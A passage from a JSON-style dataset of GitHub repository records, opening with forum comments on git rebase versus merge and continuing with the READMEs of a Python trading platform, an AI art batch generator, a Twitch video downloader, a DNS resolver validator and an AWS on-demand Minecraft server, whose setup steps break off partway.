3 commits for instance, where merge conflicts are present in each one. In the first I need to fix the merge conflict but remind myself that there are more commits following this that change this behavior.With a merge commit I am fixing the resulting work on both branches, which is easier than merging the in progress state in the current branch.Love rebasing, love merging, squash or no squash, it all depends on what I'm trying to communicate with my pushes.Just discovered the --rebase-merges option, worth exploring if you want to edit a commit under a merge commit, but don't want to mess up the merge commits.The following tip from OP could be rather useful. git rebase --exec 'make test' main\n\nThe --exec flag allows you to run any shell command after each rebased commit, stopping if the shell command fails (which is signaled by a non zero exit code).I don't know if it's possible to write an article like this and not just be preaching to the choir; ignored by the flock that's already decided it doesn't like it.Rebasing is merging multiple commits to one commit right? Basically you commit your small changes to your local master branch and at some point you merge them to one commit and push them to master repo?No rebase tutorial is complete without the --onto option, which lets you essentially transplant a series of commits to a completely different branch.Very useful when you've created a branch(A) based on another branch(B), which in turn was based on master, but in the meantime master had a few commits added, so while it's trivial to rebase B with master, rebasing A with an updated B won't work.Rules I would have everyone follow if I was a dictator:1. 1 PR, 1 commit.2. 1 PR cannot have more than 50 lines of product code added. Any number of lines can be removed. You can have up to 100 lines of test code.3. Every PR should include a set of tests for the added/changed functionality. They must pass.4. Git merge is forbidden. Everyone must rebase.5. Every PR goes into master. Nobody can push to master. You can create as many feature branches you like, but definition of done is that your code is available on master.6. Identify relevant existing test cases and make sure they are passing.7. Master must always be in a state that it can be deployed instantly.A lot of people have hate for rebase, but I've always LOVED it. I've always had way less issues with it than merge. Whenever I do a feature I work in a feature branch then just rebase it with the target branch (main) before submitting the PR and it is a really painless workflow I've used for years.On Mac, I prefer Gitup, a free and open source GUI which makes rebases (and a bunch of other git operations) much easier: https://github.com/git-up/GitUpA much more in-depth, advanced, and more valuable imo, article on the same topic https://medium.com/@porteneuve/getting-solid-at-git-rebase-v...irony is that my team use gitlab and we have auto squash before merge, avoiding manual rebasingI would recommend not doing anything complicated such as git rebase and just add more commits, patches (git diff / apply), or merges until your code works. If the number of commits is large, it doesn\u2019t really matter. Optimizing for a pretty looking git history is probably the most foolish thing to focus on.If you are doing anything that involves rewriting the history you are doing it wrong.Rebase is something that I see a lot of developers shy away from but it is usually the right way to get a feature branch re-aligned.My practice is to rebase all my pending PRs each morning to make sure that the prior day's activity is coalesced.If you wait weeks and weeks to do the first rebase for a big change set, you can wind up visiting the same files and conflicts way more times than is logical. In my experience, this results in a much greater chance of screwing something up along the way, further reinforcing for some developers that the rebase is bad.Timely rebase is the answer.--fixup has been incredibly useful for my rebase workflows.Anyone who has experienced rebasing a PR on github knows how much it hurts the review process.Thanks for posting! We just adopted rebase for our docs repo, so this was a timely article for me. I do really like the clean commit history, but I also haven't experienced any of the downsides yet.I think squash is what most workflows and teams actually want. Rebase doesn\u2019t scale well with the team size and merge makes rollbacks somewhat unwieldy and history messy.I say just merge it in and stop worrying about it so much.Squash + Merge is better for the vast majority of developers who put garbage commit messages in their feature branches.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kieran-mackle/AutoTrader", "link": "https://github.com/kieran-mackle/AutoTrader", "tags": ["algorithmic-trading", "algo-trading", "forex", "crypto", "stocks", "finance", "investing", "trading", "trading-strategies", "trading-bot", "trading-platform", "oanda", "trading-algorithms", "python", "quantitative-finance", "quantitative-trading", "technical-analysis", "autotrader"], "stars": 512, "description": "A Python-based development platform for automated trading systems - from backtesting to optimisation to livetrading. ", "lang": "Python", "repo_lang": "", "readme": "

\n \n \"AutoTrader\n \n

\n\n

AutoTrader

\n\n

\n \n \"Latest\n \n \n \n \"Total\n \n \n \n \"Monthly\n \n \n \n \"Build\n \n \n \n Documentation Status\n \n \n \n \"Code\n \n \n

\n\n\n\nAutoTrader is Python-based platform intended to help in the development, optimisation and deployment of automated trading systems. \nA basic level of experience with Python is recommended for using AutoTrader, but the [docs](https://autotrader.readthedocs.io/en/latest/) \naim to make using it as easy as possible with detailed tutorials and documentation.\n\n## Latest News\n- Version 0.7 has been released, adding integrations with [CCXT](https://github.com/ccxt/ccxt) and [dYdX](https://dydx.exchange/) crypto exchanges. Many more powerful upgrades too.\n- AutoTrader has been featured in GitClone's recent article, [*Top Crypto Trader Open-Source Projects on Github*](https://gitclone.dev/top-crypto-trader-open-source-projects-on-github/).\n\n## Features\n- A feature-rich trading simulator, supporting [backtesting](https://autotrader.readthedocs.io/en/latest/features/backtesting.html) and \npapertrading. The 'virtual broker' allows you to test your strategies in a risk-free, simulated environment before going live. Capable \nof simulating multiple order types, stop-losses and take-profits, cross-exchange arbitrage and portfolio strategies, AutoTrader has \nmore than enough to build a profitable trading system.\n- [Integrated data feeds](https://kieran-mackle.github.io/AutoTrader/tutorials/price-data), making OHLC data retrieval as easy as possible.\n- [Automated interactive visualisation](https://autotrader.readthedocs.io/en/latest/features/visualisation.html) using [Bokeh](https://bokeh.org/)\n- [Library of custom indicators](https://autotrader.readthedocs.io/en/latest/indicators.html).\n- [Live trading](https://autotrader.readthedocs.io/en/latest/features/live-trading.html) supported for multiple venues.\n- [Detailed documenation and tutorials](https://autotrader.readthedocs.io/en/latest/index.html)\n- [Repository](https://github.com/kieran-mackle/autotrader-demo) of example strategies\n\n## Supported Brokers and Exchanges\n\n| Broker | Asset classes | Integration status |\n| -------- | ------------- | ------------------ |\n| [Oanda](https://www.oanda.com/) | Forex CFDs | Complete |\n| [Interactive Brokers](https://www.interactivebrokers.com/en/home.php) | Many | In progress |\n| [dYdX](https://dydx.exchange/) | Cryptocurrencies | Complete |\n| [CCXT](https://github.com/ccxt/ccxt) | Cryptocurrencies | In progress |\n\n\n## Installation\nAutoTrader can be installed using pip:\n```\npip install autotrader\n```\n### Updating\nAutoTrader can be updated by appending the `--upgrade` flag to the install command:\n```\npip install autotrader --upgrade\n```\n\n## Documentation\nAutoTrader is very well documented in-code and on [Read the Docs](https://autotrader.readthedocs.io/en/latest/). There is also a [detailed walthrough](https://autotrader.readthedocs.io/en/latest/tutorials/walkthrough.html), covering everything from strategy concept to livetrading.\n\n### Example Strategies\nExample strategies can be found in the [demo repository](https://github.com/kieran-mackle/autotrader-demo).\n\n\n## Backtest Demo\nThe chart below is produced by a backtest of the MACD trend strategy documented in the \n[tutorials](https://autotrader.readthedocs.io/en/latest/tutorials/building-strategy.html) (and available in the \n[demo repository](https://github.com/kieran-mackle/autotrader-demo)). Entry signals are defined by MACD crossovers, with exit targets defined\nby a 1.5 risk-to-reward ratio. Stop-losses are automatically placed using the custom\n[swing detection](https://autotrader.readthedocs.io/en/latest/indicators.html#swing-detection) indicator, and position sizes are dynamically calculated based \non risk percentages defined in the strategy configuration.\n\nRunning this strategy with AutoTrader in backtest mode will produce the following interactive chart. \n\n[![MACD-backtest-demo](https://user-images.githubusercontent.com/60687606/128127659-bf81fdd2-c246-4cd1-b86d-ef624cac50a7.png)](https://autotrader.readthedocs.io/en/latest/tutorials/backtesting.html#interactive-chart)\n\nNote that stop loss and take profit levels are shown for each trade taken. This allows you to see how effective your exit strategy is - are you being stopped out too \nearly by placing your stop losses too tight? Are you missing out on otherwise profitable trades becuase your take profits are too far away? AutoTrader helps you \nvisualise your strategy and answer these questions.\n\n## Legal \n### License\nAutoTrader is licensed under the [GNU General Public License v3.0](https://www.gnu.org/licenses/gpl-3.0.en.html).\n\n### Disclaimer\nThis platform is currently under heavy development and should not be considered stable for livetrading until version 1.0.0 is released.\n\nNever risk money you cannot afford to lose. Always test your strategies on a paper trading account before taking it live.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rbbrdckybk/ai-art-generator", "link": "https://github.com/rbbrdckybk/ai-art-generator", "tags": ["machine-learning", "vqgan-clip", "deep-learning", "image-generation", "clip-guided-diffusion", "generative-art", "stable-diffusion"], "stars": 512, "description": "For automating the creation of large batches of AI-generated artwork locally.", "lang": "Python", "repo_lang": "", "readme": "# 2022-09-28 Update:\nJust a note that I've launched [Dream Factory](https://github.com/rbbrdckybk/dream-factory), a significant upgrade to this. It's got an (optional) GUI, true simultaneous multi-GPU support, an integrated gallery with full EXIF metadata support, and many other new [features](https://github.com/rbbrdckybk/dream-factory#features). \n\nI dropped VQGAN and Disco Diffusion support to focus on Stable Diffusion, so if you want VQGAN and/or Disco Diffusion you should stick with this for now. Otherwise I encourage everyone to migrate to Dream Factory! I'll continue to patch bug fixes on this repo but I likely won't be adding new features going foward.\n\n# AI Art Generator\nFor automating the creation of large batches of AI-generated artwork locally. Put your GPU(s) to work cranking out AI-generated artwork 24/7 with the ability to automate large prompt queues combining user-selected subjects, styles/artists, and more! More info on which models are available after the sample pics. \nSome example images that I've created via this process (these are cherry-picked and sharpened): \n\"sample\n\"sample\n\"sample\n\"sample\n\"sample\n\"sample \nNote that I did not create or train the models used in this project, nor was I involved in the original coding. I've simply modified the original colab versions so they'll run locally and added some support for automation.\nModels currently supported, with links to their original implementations:\n * [Stable Diffusion](https://github.com/CompVis/stable-diffusion)\n * CLIP-guided Diffusion (via [Disco Diffusion](https://colab.research.google.com/github/alembics/disco-diffusion/blob/main/Disco_Diffusion.ipynb) adapted to run locally)\n * [VQGAN+CLIP](https://colab.research.google.com/github/justinjohn0306/VQGAN-CLIP/blob/main/VQGAN%2BCLIP(Updated).ipynb)\n\n# Requirements\n\nYou'll need an Nvidia GPU, preferably with a decent amount of VRAM. 12GB of VRAM is sufficient for 512x512 output images depending on model and settings, and 8GB should be enough for 384x384 (8GB should be considered a reasonable minimum!). To generate 1024x1024 images, you'll need ~24GB of VRAM or more. Generating small images and then upscaling via [ESRGAN](https://github.com/xinntao/Real-ESRGAN) or some other package provides very good results as well.\n\nIt should be possible to run on an AMD GPU, but you'll need to be on Linux to install the ROCm version of Pytorch. I don't have an AMD GPU to throw into a Linux machine so I haven't tested this myself.\n\n# Setup\n\nThese instructions were tested on a Windows 10 desktop with an Nvidia 3080 Ti GPU (12GB VRAM), and also on an Ubuntu Server 20.04.3 system with an old Nvidia Tesla M40 GPU (24GB VRAM).\n\n**[1]** Install [Anaconda](https://www.anaconda.com/products/individual), open the root terminal, and create a new environment (and activate it):\n```\nconda create --name ai-art python=3.9\nconda activate ai-art\n```\n\n**[2]** Install Pytorch:\n```\nconda install pytorch torchvision torchaudio cudatoolkit=11.3 -c pytorch\n```\nNote that you can customize your Pytorch installation by using [the online tool located here](https://pytorch.org/get-started/locally/).\n\n**[3]** Install other required Python packages:\n```\nconda install -c anaconda git urllib3\npip install transformers keyboard pillow ftfy regex tqdm omegaconf pytorch-lightning IPython kornia imageio imageio-ffmpeg einops torch_optimizer\n```\n\n**[4]** Clone this repository and switch to its directory:\n```\ngit clone https://github.com/rbbrdckybk/ai-art-generator\ncd ai-art-generator\n```\nNote that Linux users may need single quotes around the URL in the clone command.\n\n**[5]** Clone additional required repositories:\n```\ngit clone https://github.com/openai/CLIP\ngit clone https://github.com/CompVis/taming-transformers\n```\n\n**[6]** Download the default VQGAN pre-trained model checkpoint files:\n```\nmkdir checkpoints\ncurl -L -o checkpoints/vqgan_imagenet_f16_16384.yaml -C - \"https://heibox.uni-heidelberg.de/d/a7530b09fed84f80a887/files/?p=%2Fconfigs%2Fmodel.yaml&dl=1\"\ncurl -L -o checkpoints/vqgan_imagenet_f16_16384.ckpt -C - \"https://heibox.uni-heidelberg.de/d/a7530b09fed84f80a887/files/?p=%2Fckpts%2Flast.ckpt&dl=1\"\n```\nNote that Linux users should replace the double quotes in the curl commands with single quotes.\n\n**[7]** (Optional) Download additional pre-trained models: \nAdditional models are not necessary, but provide you with more options. [Here is a good list of available pre-trained models](https://github.com/CompVis/taming-transformers#overview-of-pretrained-models). \nFor example, if you also wanted the FFHQ model (trained on faces): \n```\ncurl -L -o checkpoints/ffhq.yaml -C - \"https://app.koofr.net/content/links/0fc005bf-3dca-4079-9d40-cdf38d42cd7a/files/get/2021-04-23T18-19-01-project.yaml?path=%2F2021-04-23T18-19-01_ffhq_transformer%2Fconfigs%2F2021-04-23T18-19-01-project.yaml&force\"\ncurl -L -o checkpoints/ffhq.ckpt -C - \"https://app.koofr.net/content/links/0fc005bf-3dca-4079-9d40-cdf38d42cd7a/files/get/last.ckpt?path=%2F2021-04-23T18-19-01_ffhq_transformer%2Fcheckpoints%2Flast.ckpt\"\n```\n\n**[8]** (Optional) Test VQGAN+CLIP: \n```\npython vqgan.py -s 128 128 -i 200 -p \"a red apple\" -o output/output.png\n```\nYou should see output.png created in the output directory, which should loosely resemble an apple.\n\n**[9]** Install packages for CLIP-guided diffusion (if you're only interested in VQGAN+CLIP, you can skip everything from here to the end): \n```\npip install ipywidgets omegaconf torch-fidelity einops wandb opencv-python matplotlib lpips datetime timm\nconda install pandas\n```\n\n**[10]** Clone repositories for CLIP-guided diffusion:\n```\ngit clone https://github.com/crowsonkb/guided-diffusion\ngit clone https://github.com/assafshocher/ResizeRight\ngit clone https://github.com/CompVis/latent-diffusion\n```\n\n**[11]** Download models needed for CLIP-guided diffusion:\n```\nmkdir content\\models\ncurl -L -o content/models/256x256_diffusion_uncond.pt -C - \"https://openaipublic.blob.core.windows.net/diffusion/jul-2021/256x256_diffusion_uncond.pt\"\ncurl -L -o content/models/512x512_diffusion_uncond_finetune_008100.pt -C - \"http://batbot.tv/ai/models/guided-diffusion/512x512_diffusion_uncond_finetune_008100.pt\"\ncurl -L -o content/models/secondary_model_imagenet_2.pth -C - \"https://ipfs.pollinations.ai/ipfs/bafybeibaawhhk7fhyhvmm7x24zwwkeuocuizbqbcg5nqx64jq42j75rdiy/secondary_model_imagenet_2.pth\"\nmkdir content\\models\\superres\ncurl -L -o content/models/superres/project.yaml -C - \"https://heibox.uni-heidelberg.de/f/31a76b13ea27482981b4/?dl=1\"\ncurl -L -o content/models/superres/last.ckpt -C - \"https://heibox.uni-heidelberg.de/f/578df07c8fc04ffbadf3/?dl=1\"\n```\nNote that Linux users should again replace the double quotes in the curl commands with single quotes, and replace the **mkdir** backslashes with forward slashes.\n\n**[12]** (Optional) Test CLIP-guided diffusion: \n```\npython diffusion.py -s 128 128 -i 200 -p \"a red apple\" -o output.png\n```\nYou should see output.png created in the output directory, which should loosely resemble an apple.\n\n**[13]** Clone Stable Diffusion repository (if you're not interested in SD, you can skip everything from here to the end):\n```\ngit clone https://github.com/rbbrdckybk/stable-diffusion\n```\n\n**[14]** Install additional dependancies required by Stable Diffusion:\n```\npip install diffusers\n```\n\n**[15]** Download the Stable Diffusion pre-trained checkpoint file:\n```\nmkdir stable-diffusion\\models\\ldm\\stable-diffusion-v1\ncurl -L -o stable-diffusion/models/ldm/stable-diffusion-v1/model.ckpt -C - \"https://huggingface.co/CompVis/stable-diffusion-v-1-4-original/resolve/main/sd-v1-4.ckpt\"\n```\n**If the curl command doesn't download the checkpoint, it's gated behind a login.** You'll need to register [here](https://huggingface.co/CompVis) (only requires email and name) and then you can download the checkpoint file [here](https://huggingface.co/CompVis/stable-diffusion-v-1-4-original/resolve/main/sd-v1-4.ckpt). \nAfter downloading, you'll need to place the .ckpt file in the directory created above and name it **model.ckpt**. \n\n**[16]** (Optional) Test Stable Diffusion: \nThe easiest way to test SD is to create a simple prompt file with **!PROCESS = stablediff** and a single subject. See *example-prompts.txt* and the next section for more information. Assuming you create a simple prompt file called *test.txt* first, you can test by running:\n```\npython make_art.py test.txt\n```\nImages should be saved to the **output** directory if successful (organized into subdirectories named for the date and prompt file).\n\n**[17]** Setup ESRGAN/GFPGAN (if you're not planning to upscale images, you can skip this and everything else):\n```\ngit clone https://github.com/xinntao/Real-ESRGAN\npip install basicsr facexlib gfpgan\ncd Real-ESRGAN\ncurl -L -o experiments/pretrained_models/RealESRGAN_x4plus.pth -C - \"https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth\"\npython setup.py develop\ncd ..\n```\n \nYou're done!\n \nIf you're getting errors outside of insufficient GPU VRAM while running and haven't updated your installation in awhile, try updating some of the more important packages, for example:\n```\npip install transformers -U\n```\n\n# Usage\n\nEssentially, you just need to create a text file containing the subjects and styles you want to use to generate images. If you have 5 subjects and 20 styles in your prompt file, then a total of 100 output images will be created (20 style images for each subject).\n\nTake a look at **example-prompts.txt** to see how prompt files should look. You can ignore everything except the [subjects] and [styles] areas for now. Lines beginning with a '#' are comments and will be ignored, and lines beginning with a '!' are settings directives and are explained in the next section. For now, just modify the example subjects and styles with whatever you'd like to use.\n\nAfter you've populated **example-prompts.txt** to your liking, you can simply run:\n```\npython make_art.py example-prompts.txt\n```\nDepending on your hardware and settings, each image will take anywhere from a few seconds to a few hours (on older hardware) to create. If you can run Stable Diffusion, I strongly recommend it for the best results - both in speed and image quality.\n\nOutput images are created in the **output/[current date]-[prompt file name]/** directory by default. The output directory will contain a JPG file for each image named for the subject & style used to create it. So for example, if you have \"a monkey on a motorcycle\" as one of your subjects, and \"by Picasso\" as a style, the output image will be created as output/[current date]-[prompt file name]/a-monkey-on-a-motorcycle-by-picasso.jpg (filenames will vary a bit depending on process used).\n\nYou can press **CTRL+SHIFT+P** any time to pause execution (the pause will take effect when the current image is finished rendering). Press **CTRL+SHIFT+P** again to unpause. Useful if you're running this on your primary computer and need to use your GPU for something else for awhile. You can also press **CTRL+SHIFT+R** to reload the prompt file if you've changed it (the current work queue will be discarded, and a new one will be built from the contents of your prompt file). **Note that keyboard input only works on Windows.**\n\nThe settings used to create each image are saved as metadata in each output JPG file by default. You can read the metadata info back by using any EXIF utility, or by simply right-clicking the image file in Windows Explorer and selecting \"properties\", then clicking the \"details\" pane. The \"comments\" field holds the command used to create the image.\n\n# Advanced Usage\n\nDirectives can be included in your prompt file to modify settings for all prompts that follow it. These settings directives are specified by putting them on their own line inside of the [subject] area of the prompt file, in the following format: \n\n**![setting to change] = [new value]** \n\nFor **[setting to change]**, valid directives are: \n * PROCESS\n * CUDA_DEVICE\n * WIDTH\n * HEIGHT\n * ITERATIONS (vqgan/diffusion only)\n * CUTS (vqgan/diffusion only)\n * INPUT_IMAGE\n * SEED\n * LEARNING_RATE (vqgan only)\n * TRANSFORMER (vqgan only)\n * OPTIMISER (vqgan only)\n * CLIP_MODEL (vqgan only)\n * D_VITB16, D_VITB32, D_RN101, D_RN50, D_RN50x4, D_RN50x16 (diffusion only)\n * STEPS (stablediff only)\n * CHANNELS (stablediff only)\n * SAMPLES (stablediff only)\n * STRENGTH (stablediff only)\n * SD_LOW_MEMORY (stablediff only)\n * USE_UPSCALE (stablediff only)\n * UPSCALE_AMOUNT (stablediff only)\n * UPSCALE_FACE_ENH (stablediff only)\n * UPSCALE_KEEP_ORG (stablediff only)\n * REPEAT\n\nSome examples: \n```\n!PROCESS = vqgan\n```\nThis will set the current AI image-generation process. Valid options are **vqgan** for VQGAN+CLIP, **diffusion** for CLIP-guided diffusion (Disco Diffusion), or **stablediff** for Stable Diffusion.\n```\n!CUDA_DEVICE = 0\n```\nThis will force GPU 0 be to used (the default). Useful if you have multiple GPUs - you can run multiple instances, each with it's own prompt file specifying a unique GPU ID.\n```\n!WIDTH = 384\n!HEIGHT = 384\n```\nThis will set the output image size to 384x384. A larger output size requires more GPU VRAM. Note that for Stable Diffusion these values should be multiples of 64.\n```\n!TRANSFORMER = ffhq\n```\nThis will tell VQGAN to use the FFHQ transformer (somewhat better at faces), instead of the default (vqgan_imagenet_f16_16384). You can follow step 7 in the setup instructions above to get the ffhq transformer, along with a link to several others.\n\nWhatever you specify here MUST exist in the checkpoints directory as a .ckpt and .yaml file.\n```\n!INPUT_IMAGE = samples/face-input.jpg\n```\nThis will use samples/face-input.jpg (or whatever image you specify) as the starting image, instead of the default random noise. Input images must be the same aspect ratio as your output images for good results. Note that when using with Stable Diffusion the output image size will be the same as your input image (your height/width settings will be ignored).\n```\n!SEED = 42\n```\nThis will use 42 as the input seed value, instead of a random number (the default). Useful for reproducibility - when all other parameters are identical, using the same seed value should produce an identical image across multiple runs. Set to nothing or -1 to reset to using a random value.\n```\n!INPUT_IMAGE = \n```\nSetting any of these values to nothing will return it to its default. So in this example, no starting image will be used.\n```\n!STEPS = 50\n```\nSets the number of steps (simliar to iterations) when using Stable Diffusion to 50 (the default). Higher values take more time and may improve image quality. Values over 100 rarely produce noticeable differences compared to lower values.\n```\n!SCALE = 7.5\n```\nSets the guidance scale when using Stable Diffusion to 7.5 (the default). Higher values (to a point, beyond ~25 results may be strange) will cause the the output to more closely adhere to your prompt.\n```\n!SAMPLES = 1\n```\nSets the number of times to sample when using Stable Diffusion to 1 (the default). Values over 1 will cause multiple output images to be created for each prompt at a slight time savings per image. There is no cost in GPU VRAM required for incrementing this.\n```\n!STRENGTH = 0.75\n```\nSets the influence of the starting image to 0.75 (the default). Only relevant when using Stable Diffusion with an input image. Valid values are between 0-1, with 1 corresponding to complete destruction of the input image, and 0 corresponding to leaving the starting image completely intact. Values between 0.25 and 0.75 tend to give interesting results.\n```\n!SD_LOW_MEMORY = no\n```\nUse a forked repo with much lower GPU memory requirements when using Stable Diffusion (yes/no)? Setting this to **yes** will switch over to using a memory-optimized version of SD that will allow you to create higher resolution images with far less GPU memory (512x512 images should only require around 4GB of VRAM). The trade-off is that inference is **much** slower compared to the default official repo. For comparison: on a RTX 3060, a 512x512 image at default settings takes around 12 seconds to create; with *!SD_LOW_MEMORY = yes*, the same image takes over a minute. Recommend keeping this off unless you have under 8GB GPU VRAM, or want to experiment with creating larger images before upscaling.\n```\n!USE_UPSCALE = no\n```\nAutomatically upscale images created with Stable Diffusion (yes/no)? Uses ESRGAN/GFPGAN (see additional settings below).\n```\n!UPSCALE_AMOUNT = 2\n```\nHow much to scale when *!USE_UPSCALE = yes*. Default is 2.0x; higher values require more VRAM and time.\n```\n!UPSCALE_FACE_ENH = no\n```\nWhether or not to use GFPGAN (vs default ESRGAN) when upscaling. GFPGAN provides the best results with faces, but may provide slightly worse results if used on non-face subjects.\n```\n!UPSCALE_KEEP_ORG = no\n```\nKeep the original unmodified image when upscaling (yes/no)? If set to no (the default), the original image will be deleted. If set to yes, the original image will be saved in an **/original** subdirectory of the image output folder.\n```\n!REPEAT = no\n```\nWhen all jobs in the prompt file are finished, restart back at the top of the file (yes/no)? Default is no, which will simply terminate execution when all jobs are complete.\n\nTODO: finish settings examples & add usage tips/examples, document random_art.py\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ihabunek/twitch-dl", "link": "https://github.com/ihabunek/twitch-dl", "tags": ["twitch", "download-videos", "cli"], "stars": 512, "description": "CLI tool for downloading videos from Twitch.", "lang": "Python", "repo_lang": "", "readme": "Twitch Downloader\n=================\n\nCLI tool for downloading videos from twitch.tv\n\nInspired by [youtube-dl](https://youtube-dl.org/) but improves upon it by using\nmultiple concurrent connections to make the download faster.\n\nResources\n---------\n\n* [Documentation](https://twitch-dl.bezdomni.net/)\n* [Source code](https://github.com/ihabunek/twitch-dl)\n* [Issues](https://github.com/ihabunek/twitch-dl/issues)\n* [Python package](https://pypi.org/project/twitch-dl/)\n\nRequirements\n------------\n\n* Python 3.7 or later\n* [ffmpeg](https://ffmpeg.org/download.html), installed and on the system path\n\nQuick start\n-----------\n\nSee [installation instructions](https://twitch-dl.bezdomni.net/installation.html)\nto set up twitch-dl.\n\nList videos from a channel.\n\n```\ntwitch-dl videos bananasaurus_rex\n```\n\nList clips from a channel.\n\n```\ntwitch-dl clips bananasaurus_rex\n```\n\nDownload a video by URL.\n\n```\ntwitch-dl download https://www.twitch.tv/videos/1418494769\n```\n\nor by ID\n\n```\ntwitch-dl download 1418494769\n```\n\nDownload a clip by URL\n\n```\ntwitch-dl download https://www.twitch.tv/bananasaurus_rex/clip/PlacidColdClipsdadDeIlluminati-hL2s_aLE4CHvVN4J\n```\n\nor by slug\n\n```\ntwitch-dl download PlacidColdClipsdadDeIlluminati-hL2s_aLE4CHvVN4J\n```\n\nFor more info see [the documentation](https://twitch-dl.bezdomni.net/usage.html).\n\nLicense\n-------\n\nCopyright 2018-2022 Ivan Habunek \n\nLicensed under the GPLv3: http://www.gnu.org/licenses/gpl-3.0.html\n\nUseful links for dev\n--------------------\n\n* https://supersonichub1.github.io/twitch-graphql-api/index.html\n* https://github.com/SuperSonicHub1/twitch-graphql-api\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vortexau/dnsvalidator", "link": "https://github.com/vortexau/dnsvalidator", "tags": [], "stars": 512, "description": "Maintains a list of IPv4 DNS servers by verifying them against baseline servers, and ensuring accurate responses.", "lang": "Python", "repo_lang": "", "readme": "# DNS Validator\nMaintains a list of IPv4 DNS servers by verifying them against baseline servers, and ensuring accurate responses.\n\n[![Python 3.2|3.6](https://img.shields.io/badge/python-3.2|3.6-green.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPL3-_red.svg)](https://www.gnu.org/licenses/gpl-3.0.en.html) \n[![Twitter](https://img.shields.io/badge/twitter-@vortexau-blue.svg)](https://twitter.com/vortexau)\n[![Twitter](https://img.shields.io/badge/twitter-@codingo__-blue.svg)](https://twitter.com/codingo_) \n\n![DNSValidator](https://github.com/vortexau/dnsvalidator/blob/master/.github/dnsvalidator.png)\n\nDNS Validator's approach is different to other DNS query validation tools. This tool performs multiple validation steps on each resolver:\n\n* Baselines non-geolocated domain names against \"trusted\" public DNS resolvers, `1.1.1.1`, `8.8.8.8` and `9.9.9.9` \n * For each resolver being tested DNS Validator ensures that each baselined domain name resolves to the same IP Address.\n * Servers that return an answer that differs from the baseline are immediately skipped\n* Performs DNS lookup of known commonly spoofed DNS addresses to ensure NXDOMAIN is returned when expected.\n * Resolvers that do not return NXDOMAIN for random subdomains of known target domains are immediately skipped.\n\n# Usage\n\n| Argument | Description |\n|------------|--------------------------------------------------------------------------------------------------------------|\n| (stdin) | Pipe target lists from another application to verify. |\n| -t | Specify a target DNS server to verify. |\n| -tL | Specify a list of targets or a URL to a list of targets |\n| -e | Specify a target exclusion. |\n| -eL | Specify a list of targets or a URL to a list of targets to exclude. |\n| -r | Specify a root domain to compare to. Must be non-geolocated or most resolvers will fail. |\n| -q | Specify a resolver query to use (default:dnsvalidator) |\n| -threads | Specify the maximum number of threads to run at any one time (DEFAULT:5) |\n| -timeout | Specify a timeout value in seconds for any single thread (DEFAULT:600) |\n| -o | Specify an output file to write successful output to. |\n| --no-color | If set then any foreground or background colours will be stripped out |\n| --silent | If set then only successfully resolved servers will be displayed and banners and other information will be redacted. |\n| -v | If set then verbose output will be displayed in the terminal. |\n\n# Setup\nInstall using:\n```\n$ python3 setup.py install\n```\nDependencies will then be installed and DNS Validator will be added to your path as `dnsvalidator`.\n\n# Examples:\n\n## CLI:\n\n```bash\n$ dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 20 -o resolvers.txt\n```\n\n## Docker:\n\nBuild \n\n```bash\n$ docker build -t dnsvalidator .\n```\n\nRun:\n\n```bash\n$ docker run -v $(pwd):/dnsvalidator/output -t dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 20 -o /dnsvalidator/output/resolvers.txt\n```\n\n# Caveats\n\n* **WARNING** Keep the thread count to a reasonable level and/or use a VPS/VPN appropriately. Pushing the thread count too high can make it look like you are attempting to attack DNS servers, resulting in network level DNS blocks from your ISP. _Ask us how we know..._ \n* Root domains used for baseline tests must not be geolocated; specifically they must return the same IP address regardless of the location on the planet they are resolved from. Domains such as `google.com` or `facebook.com` (and many others) are not suitable for baselines, as they return a geo-located IP address when resolved.\n * Using a root domain that is geo-located will result in only resolvers local to the user being returned as valid.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "trevor-laher/OnDemandMinecraft", "link": "https://github.com/trevor-laher/OnDemandMinecraft", "tags": [], "stars": 512, "description": "An AWS hosted Minecraft server that will only run when players are active. Players can start the server through a simple UI accessed through free Heroku server hosting.", "lang": "Python", "repo_lang": "", "readme": "# On Demand Minecraft Server\nUsing a Python Flask application and AWS, this repository launches an AWS EC2 Instance to host a Minecraft server upon request from users through the web application. The server will automatically shut down after the server has crashed or is empty for 15 minutes. This makes server hosting for small communities very inexpensive. For up to 20 players you can expect $0.02 per hour the server runs. The largest benefit of this system is that the server bill diminishes if your community decides to take a break from the game, and will be ready to pick back up when you want to play again. No subscriptions are required.\n\nNote that this configuration will likely require familiarity with programming, SSH, and the command line.\n\n\n# AWS Setup\nThis step will properly configure your AWS account and configuration.py file so that an instance can be created via the createInstance.py script.\n\n 1. Create or access an **AWS Account**. Under the **User Dropdown** in the **Toolbar**, select **Security Credentials**, then **Access Keys**, and finally **Create New Access Key**. Download this file, open it, and copy the values of **AWSAccessKeyId** and **AWSSecretKey** to **ACCESS_KEY** and **SECRET_KEY** in the **configuration.py** file in the root directory of the repository.\n\t\n\tACCESS_KEY = 'YourAWSAccessKeyIdHere'\n\tSECRET_KEY = 'YourAWSSecretKeyHere' \n\n 3. Navigate to the **EC2 Dashboard** under the **Services Dropdown** and select **Security Groups** in the sidebar. Select **Create Security Group**, input **minecraft** for the **Security group name**. Create **Inbound Rules** for the following:\n\t - Type: **SSH** Protocol: **TCP** Port Range: **22** Source: **Anywhere**\n\t - Type: **Custom TCP Rule** Protocol: **TCP** Port Range: **25565** Source: **Anywhere**\n\t - Type: **Custom UDP Rule** Protocol: **UDP** Port Range: **25565** Source: **Anywhere**\n\t \n\t In **configuration.py** in the root directory, set **ec2_secgroups** to the name of the security group.\n\t \n\t ec2_secgroups = ['YourGroupNameHere']\n\n3. Under the **EC2 Dashboard** navigate to **Key Pairs** in the sidebar. Select **Create Key Pair**, provide a name and create. Move the file that is downloaded into the root directory of the project. In **configuration.py** in the root directory, set ** ec2_keypair** to the name entered, and **SSH_KEY_FILE_NAME** to the name.pem of the file 